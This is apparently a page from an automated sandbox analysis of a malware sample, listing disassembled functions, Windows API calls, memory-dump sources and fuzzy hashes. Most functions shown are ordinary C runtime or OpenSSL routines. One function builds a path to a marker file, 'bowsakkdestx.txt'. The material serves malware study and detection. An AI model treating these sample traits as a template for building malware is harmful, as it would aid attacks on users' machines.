                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1678825546-0
                                                                                                        • Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                        • Instruction ID: ddb8985d49e39f0c3363fa46367772430d3f1a2ae90cbc579cc918fd53fb8853
                                                                                                        • Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                        • Instruction Fuzzy Hash: F87192B1E093699BDF35EA68CC99BA9B7B5EF54330F1800D9D808A7241D7359E80EF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F373EA Relevance: 10.6, APIs: 7, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2964551433-0
                                                                                                        • Opcode ID: 74cfb5d5baf434c0f365eef5d2a958cc1653e471a114ad5f95bcda1716547f27
                                                                                                        • Instruction ID: beff976f1565925cf9a059501a3a458b046e5aa625f53f53433634b1ecf8ffd7
                                                                                                        • Opcode Fuzzy Hash: 74cfb5d5baf434c0f365eef5d2a958cc1653e471a114ad5f95bcda1716547f27
                                                                                                        • Instruction Fuzzy Hash: 2A5164B1E092599FDF74EB68CC99BA9B7B4EF08320F0400D9E909A6151E7359F80DF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F373FA Relevance: 10.6, APIs: 7, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2964551433-0
                                                                                                        • Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                        • Instruction ID: 66a483b4c0c355dee0881dcdbeaee50e4f11b492b455c72469159f2df8882605
                                                                                                        • Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                        • Instruction Fuzzy Hash: A75141B1E09259AEDF75EA68CC99BA9B7B4EF08320F0400D9E909A6151E7359F80DF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F406EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___unDName.LIBCMT ref: 00F4071B
                                                                                                        • _strlen.LIBCMT ref: 00F4072E
                                                                                                        • __lock.LIBCMT ref: 00F4074A
                                                                                                        • _malloc.LIBCMT ref: 00F4075C
                                                                                                        • _malloc.LIBCMT ref: 00F4076D
                                                                                                        • _free.LIBCMT ref: 00F407B6
                                                                                                          • Part of subcall function 00F342FD: IsProcessorFeaturePresent.KERNEL32(00000017,00F342D1,00F33B69,?,?,00F30CE9,00F3520D,?,00F342DE,00000000,00000000,00000000,00000000,00000000,00F3981C), ref: 00F342FF
                                                                                                        • _free.LIBCMT ref: 00F407AF
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3704956918-0
                                                                                                        • Opcode ID: 98d3defed0bd0daf62975b57a88ce1f5a2a874f815e00f3d8b9c07ca2d043047
                                                                                                        • Instruction ID: 04d286bd1ed934b76e19ac672022ffd359494ff6b53989295b15cfd008b067e1
                                                                                                        • Opcode Fuzzy Hash: 98d3defed0bd0daf62975b57a88ce1f5a2a874f815e00f3d8b9c07ca2d043047
                                                                                                        • Instruction Fuzzy Hash: 0921B8B1904705ABE711AB749C41B1ABBD4AF04770F148129FD189B282EF7CE840EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM ref: 00F21B1E
                                                                                                        • timeGetTime.WINMM ref: 00F21B29
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B4C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F21B5C
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21B6A
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00F21B72
                                                                                                        • timeGetTime.WINMM ref: 00F21B78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697694649-0
                                                                                                        • Opcode ID: fead3ebd68f149dfb06b2d689331d05c50ba1831460f7f91dcf9e5f404e33a55
                                                                                                        • Instruction ID: db0b7afb62c0997a1d282909b7cb5e2869b32df70cd30b343d839163da3ca3cd
                                                                                                        • Opcode Fuzzy Hash: fead3ebd68f149dfb06b2d689331d05c50ba1831460f7f91dcf9e5f404e33a55
                                                                                                        • Instruction Fuzzy Hash: FB017132E41329AADB20ABB59C45FEDB778BB48B50F044066E700A7190E660A901DBE9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F35141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __init_pointers.LIBCMT ref: 00F35141
                                                                                                          • Part of subcall function 00F37D6C: EncodePointer.KERNEL32(00000000,?,00F35146,00F33FFE,01017990,00000014), ref: 00F37D6F
                                                                                                          • Part of subcall function 00F37D6C: __initp_misc_winsig.LIBCMT ref: 00F37D8A
                                                                                                          • Part of subcall function 00F37D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F426B3
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F426C7
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F426DA
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F426ED
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F42700
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F42713
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F42726
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F42739
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F4274C
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F4275F
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F42772
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F42785
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F42798
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F427AB
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F427BE
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F427D1
                                                                                                        • __mtinitlocks.LIBCMT ref: 00F35146
                                                                                                        • __mtterm.LIBCMT ref: 00F3514F
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B62
                                                                                                          • Part of subcall function 00F351B7: _free.LIBCMT ref: 00F38B69
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(0101AC00,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B8B
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35174
                                                                                                        • __initptd.LIBCMT ref: 00F35196
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F3519D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3567560977-0
                                                                                                        • Opcode ID: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction ID: f679d2c69902e0ebd839cf369d566a671e782742f7fa2ab4ee7eef1b5a4114d0
                                                                                                        • Opcode Fuzzy Hash: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction Fuzzy Hash: 40F0243394AB515DE23577B47D03B4A3AD0EF41B70F21062AF864C62D5FF2D94427190
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F353AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3594A
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00F33B69,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • _free.LIBCMT ref: 00F35970
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        • __lock.LIBCMT ref: 00F35989
                                                                                                        • ___removelocaleref.LIBCMT ref: 00F35998
                                                                                                        • ___freetlocinfo.LIBCMT ref: 00F359B1
                                                                                                        • _free.LIBCMT ref: 00F359C4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 626533743-0
                                                                                                        • Opcode ID: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction ID: 477a2b5d2735083591fed8bbf1e196250d97797bf43d6fde0d42bfd627e9a0d6
                                                                                                        • Opcode Fuzzy Hash: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction Fuzzy Hash: B5016D32903B04E6DE35AB68EC46B1D73A06F80BB1F24424EF464961D4CF7C9981FA51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F606A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00F607C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                        • API String ID: 601868998-2416195885
                                                                                                        • Opcode ID: 5adce71ff8ecc54423e1c27851db7937a766f2b7ad4a70c4f3a9c49e4e2001a1
                                                                                                        • Instruction ID: c4ae6525ae7dea929a4baae36b1aac22e36582d8d8d85d8c624f68e8b99d0102
                                                                                                        • Opcode Fuzzy Hash: 5adce71ff8ecc54423e1c27851db7937a766f2b7ad4a70c4f3a9c49e4e2001a1
                                                                                                        • Instruction Fuzzy Hash: EF411971A043059BDB20EE25CC45BAFB3D9EF91354F00082EF585D3242EB79E9089BE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00FD5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getptd_noexit.LIBCMT ref: 00FD5D3D
                                                                                                          • Part of subcall function 00F3501F: GetLastError.KERNEL32(?,00F33B69,00F3520D,00F30CE9,?,?,00F33B69,?), ref: 00F35021
                                                                                                          • Part of subcall function 00F3501F: __calloc_crt.LIBCMT ref: 00F35042
                                                                                                          • Part of subcall function 00F3501F: __initptd.LIBCMT ref: 00F35064
                                                                                                          • Part of subcall function 00F3501F: GetCurrentThreadId.KERNEL32 ref: 00F3506B
                                                                                                          • Part of subcall function 00F3501F: SetLastError.KERNEL32(00000000,00F33B69,00F3520D,00F30CE9,?,?,00F33B69,?), ref: 00F35083
                                                                                                        • __calloc_crt.LIBCMT ref: 00FD5D60
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5D7E
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5DCD
                                                                                                        Strings
                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00FD5D48, 00FD5D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                        • API String ID: 3123740607-798102604
                                                                                                        • Opcode ID: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction ID: 5509a4d0d749bdbeb60be43ec40d249dbd92c32bcf3d602493f2d11b563c8c2b
                                                                                                        • Opcode Fuzzy Hash: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction Fuzzy Hash: 7F11C472909E156BEB222A659C05AAB739FEF00FB0F140427FE09A6341E625ED0072B0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F72FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fprintf_memset
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                        • Opcode ID: f7f92e2a180aaa63e610ec8f0ef6ee51a350b5011f9ea8c0638311b9b2f68a9b
                                                                                                        • Instruction ID: 67463655a65df6f871ce74026ee85e6bad4e243baa3a39a9f88ec3e31b6b20a1
                                                                                                        • Opcode Fuzzy Hash: f7f92e2a180aaa63e610ec8f0ef6ee51a350b5011f9ea8c0638311b9b2f68a9b
                                                                                                        • Instruction Fuzzy Hash: AA215772B043157BE620A925AC02FBB7799EFC1BACF048414FA54A71C6D622ED0562B3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C51B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C539
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: b58c232de9b3c6920899ffaec95b1b44c9c92ae0205e1dae3824fcc202232a73
